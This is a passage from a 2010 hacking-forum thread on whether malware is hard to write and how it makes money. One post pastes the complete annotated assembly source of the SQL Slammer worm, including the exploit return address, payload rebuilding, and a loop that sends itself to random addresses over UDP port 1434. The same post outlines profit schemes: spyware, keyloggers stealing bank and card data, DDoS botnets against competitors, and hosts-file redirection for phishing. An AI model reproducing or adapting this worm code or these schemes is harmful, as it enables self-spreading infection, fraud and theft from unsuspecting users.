Big Money and Malware
12 posts • Page 2 of 2 • 1, 2
Re: Big Money and Malware
by DamegedSpy on Fri Mar 12, 2010 3:08 am
([msg=36581]see Re: Big Money and Malware[/msg])
Define successful
- DamegedSpy
- Poster
- Posts: 273
- Joined: Sat Dec 19, 2009 1:40 pm
- Blog: View Blog (0)
Re: Big Money and Malware
by Primux on Thu Mar 18, 2010 12:10 am
([msg=36994]see Re: Big Money and Malware[/msg])
I wouldn't say the true hackers create the viruses. They're not hard to create. -sanddbox
Malware is fairly simpler to develop than a simple game =P. -DamegedSpy
I'm sorry, but I've got to disagree with the both of you. Making a virus, especially these days, is a very difficult operation. You've got to understand how to cause buffer overflows on windows system processes, you've got to attach your dlls to the windows processes like smss and winlogon, you've got to write your virus to be able to get around the giants like Norton and Macafee, and you've got to do all of this almost exclusively in assembly!
This is the shortest/smallest virus I could find. The Slammer worm. Yeah, that looks like it's super easy to code!
- Code: Select all
push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h ;
; Reconstruct session, after the overflow the payload buffer
; gets corrupted during program execution but before the
; payload is executed. The worm writer rebuilds the buffer
; so he can later resend it in the sendto() loop.
xor ecx, ecx
mov cl, 18h
fixup_payload:
push eax
loop fixup_payload
xor eax, 5010101h ; 0x1010101 xor 0x5010101 = 0x04000000 (msg_type for sql resoloution request)
;
; 0x04 is the msg type for request, he has no rebuilt the payload
; so it can be fired over the wire later and reinfect.
push eax
mov ebp, esp ;
; Move esp into ebp. This will allow him to reference data
; pushed onto the stack later using ebp. He could use esp
; also except for the fact that he push's a lot of values and
; an esp offset will not as reliable. So he chose ebp...
;
push ecx ;
; During this phase a series of strings and terminating
; nulls are pushed onto the stack. This method is common
; in simple exploits that don't require a large amount of
; imports to operate. It should also noted that the worm
; use’s the ecx register to store nulls, after it is
; decremented to zero from the loop routine.
;
push 6C6C642Eh
push 32336C65h
push 6E72656Bh ; Push string kernel32.dll
push ecx
push 746E756Fh ; Push string GetTickCount
push 436B6369h
push 54746547h
mov cx, 6C6Ch
push ecx
push 642E3233h ; Push string ws2_32.dll
push 5F327377h
mov cx, 7465h
push ecx
push 6B636F73h ; Push string socket
mov cx, 6F74h
push ecx
push 646E6573h ; Push string sendto
;
mov esi, 42AE1018h ; sqlsort.dll->IAT entry for LoadLibrary
;
; The worm writer uses the sqlsort IAT to locate
; the entry points for LoadLibrary and GetProcAddress.
;
lea eax, [ebp-2Ch] ; Load address of string "ws2_32.dll" into eax and
; supply as an argument to LoadLibrary.
push eax
call dword ptr [esi] ; call sqlsort:[IAT]->LoadLibrary("ws2_32.dll")
;
push eax ; When LoadLibrary returns, the base of ws2_32 is in eax.
; This will be used later for a GetProcAddress so he saves
; it on the stack using a push..
;
lea eax, [ebp-20h] ; Load address of string "GetTickCount" into eax and
; push it on the stack. This will be used as an argument
; to the GetProcAddress call after the next LoadLibrary call.
push eax
lea eax, [ebp-10h] ; Load address of string "kernel32.dll" into eax
push eax
call dword ptr [esi] ; call sqlsort:[IAT]->LoadLibrary("kernel32.dll")
;
push eax ; When LoadLibrary returns, the base of kernel32 is in eax.
; This will be used later for a GetProcAddress so he saves
; it on the stack using a push..
;
mov esi, 42AE1010h ; Move sqlsort:[IAT] entry into esi. The IAT, or Import Address
; Table will shift across dll versions so the worm writer checks a
; small instruction sequence at the entry point of the function to
; verify that it is in fact, GetProcAddress.
;
;
mov ebx, [esi] ; Move IAT entry (function entry point) into ebx.
;
mov eax, [ebx] ; Move 4 bytes of instructions from function entry point into eax.
;
cmp eax, 51EC8B55h ; Check entry point fingerprint for getprocaddress, if the compare fails he uses
; an assumed IATentry. So he checks the entry, if it's not GetProcAddress he
; assumes it's an alternate dll version and uses the static entry in that assumed
; dll version.
;
; The library version I have is:2000.80.534.0. This dll version hips with a base
; installation of MSSQL server 2000. The IATwith this DLL is an entry point for
; RtlEnterCriticalSection, so the first check will obviously fail and the jz will
; not succeed.
;
; It is undetermined what dll versions this payload will succeed on. Due to
; the "if not, then other" importing scheme, this may not work across all dll
; versions.
;
;
jz short FOUND_IT ; GetProcAddress(kernel32_base,GetTickCount)
mov esi, 42AE101Ch ; This point is only reached if the previous test failed. On a
; default install of MSSQL Server 2000, we will reach this point.
; Then next assignment will assign esi the sqlsort.dll->IAT entry
; for GetProcAddress.
FOUND_IT:
call dword ptr [esi] ; GetProcAddress(kernel32_base,GetTickCount)
call eax ; GetTickCount()
xor ecx, ecx
push ecx
push ecx
push eax ; Push GetTickCount returned value, which is the number
; of milliseconds since the system was last started. This value
; will later be used as a seed for the pseudo random number
; generation.
;
;
xor ecx, 9B040103h ; 0x9B040103 xor 0x1010101 = 9A050002 (dest port/family)
;
xor ecx, 1010101h
push ecx ; 9A050002 = port 1434 / AF_INET
;
lea eax, [ebp-34h] ; Load address of string "socket" into eax and supply
; it as the second argument to GetProcAddress
push eax
mov eax, [ebp-40h] ; Load ws2_32 base address into eax and
; supply as first argument to GetProcAddress.
push eax
call dword ptr [esi] ; GetProcAddress(ws2_32,socket)
push 11h
push 2
push 2
call eax ; socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
;
push eax ; Push socket descriptor
;
lea eax, [ebp-3Ch] ; Load address of string "sendto" into eax and
; supply it as the second argument to GetProcAddress.
push eax
mov eax, [ebp-40h] ; Load ws2_32 base address into eax and
; supply it as the first address to GetProcAddress.
push eax
call dword ptr [esi] ; GetProcAddress(ws2_32,sendto)
mov esi, eax ; Save the entry point for sendto, returned by GetProcAddress
; into esi.
;
or ebx, ebx ; ebx = 77F8313C, left over from the sqlsort IAT reads.
;
xor ebx, 0FFD9613Ch ; We'll end up with 0x88215000 or 0x88336870, depending on dll
; version. Other values are generated depending on dll version.
;
PSEUDO_RAND_SEND:
mov eax, [ebp-4Ch] ; Load the seed from GetTickCount into eax and enter pseudo
; random generation. The pseudo generation also takes input from
; an xor'd IAT entry to assist in more random generation.
;
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx
mov [ebp-4Ch], eax ; Store generated IP address into sock_addr structure.
push 10h
lea eax, [ebp-50h] ; Load address of the sock_addr structure that was
; created earlier, into eax, then push as an argument
; to sendto().
;
push eax
xor ecx, ecx ; Push (flags) = 0
push ecx
xor cx, 178h ; Push payload length = 376
push ecx
lea eax, [ebp+3] ; Push address of payload
push eax
mov eax, [ebp-54h]
push eax
call esi ; sendto(sock,payload,376,0, sock_addr struct, 16)
;
jmp short PSEUDO_RAND_SEND
Link to the code if it looks garbled to you. http://www.eeye.com/html/Research/Flash/sapphire.txt
Anyone able to produce a successful virus these days meets the criteria for being deemed a hacker IMHO. -tgoe
I would tend to agree. They may not be a very nice hacker, and they may totally f*** some people up, but they most definitively are hackers.
------------------------------------------
NOW, with respect to making money from malware, it's really very simple. This may have been addressed on the page that defience posted a link to, I don't know, I didn't read it. Either way, there are two (possibly three) big ways to make money from malware. Spyware, programs that sit on your system and watch your browsing/computing habits is big money. Companies will pay for information on what consumers are doing on their computers, especially groups like advertising companies. MywebSearch makes bajillions of dollars by simply watching what you search for and every page you view, and sending the data to their "partners" who then use that data to target you with advertising and all of the whatnot that goes along with that.
Another big bucks malware making strategy is the obvious: making malware to steal your personal information. Many viruses will sit on your system and employ keyloggers or packet sniffers to catch your login information for your work, your bank, and your credit card's sites. They will also sometimes simply search your drive for saved credit card numbers, or also employ the keyloggers to pick up you card number, expiration date, social security number, address, name, mother's maiden name . . . well, you get the idea.
The third way of making money from malware is kind of abstract (not sure if that's quite the right word). Essentially though, the baddies can get their virus on tons of people's computers to make a huge botnet that they can control all by themselves. They can then use this botnet for whatever they want, for example carrying out a DDoS on a server they want to take down. Historically this hasn't really been used for profit, the chineese and the north koreans wrote viruses to bring down windowsupdate.microsoft.com, whitehouse.gov and I believe some of the pentagon's server's. This could presumably be used, if you're selling something online, to bring down your competitor's website.
Also, something I just remembered while I was typing this but was too lazy to properly insert into the appropriate paragraphs: Again if you're selling something or you want people going to your website, you can implement browser hijacks or put entries into the hosts file to point people to your website when they go to competitorwebsite.com. On that note with respect to stealing credit card information, you could use the same tactic to perform in essence, some sort of phishing. You use a Browser Helper Object malware app, or something that writes to the hosts file to point the victim to your imitation of the banks/credit cards/online store's website and simply capture the information as they foolishly send you all of their personal data.
So . . . that's pretty much it in a nutshell. You can make money off of malware by using it to get credit card numbers, or to sell people's computer usage habits to advertisers. FUN
- Primux
- New User
- Posts: 10
- Joined: Mon Aug 03, 2009 1:57 am
- Blog: View Blog (0)
12 posts • Page 2 of 2 • 1, 2
Who is online
Users browsing this forum: No registered users and 0 guests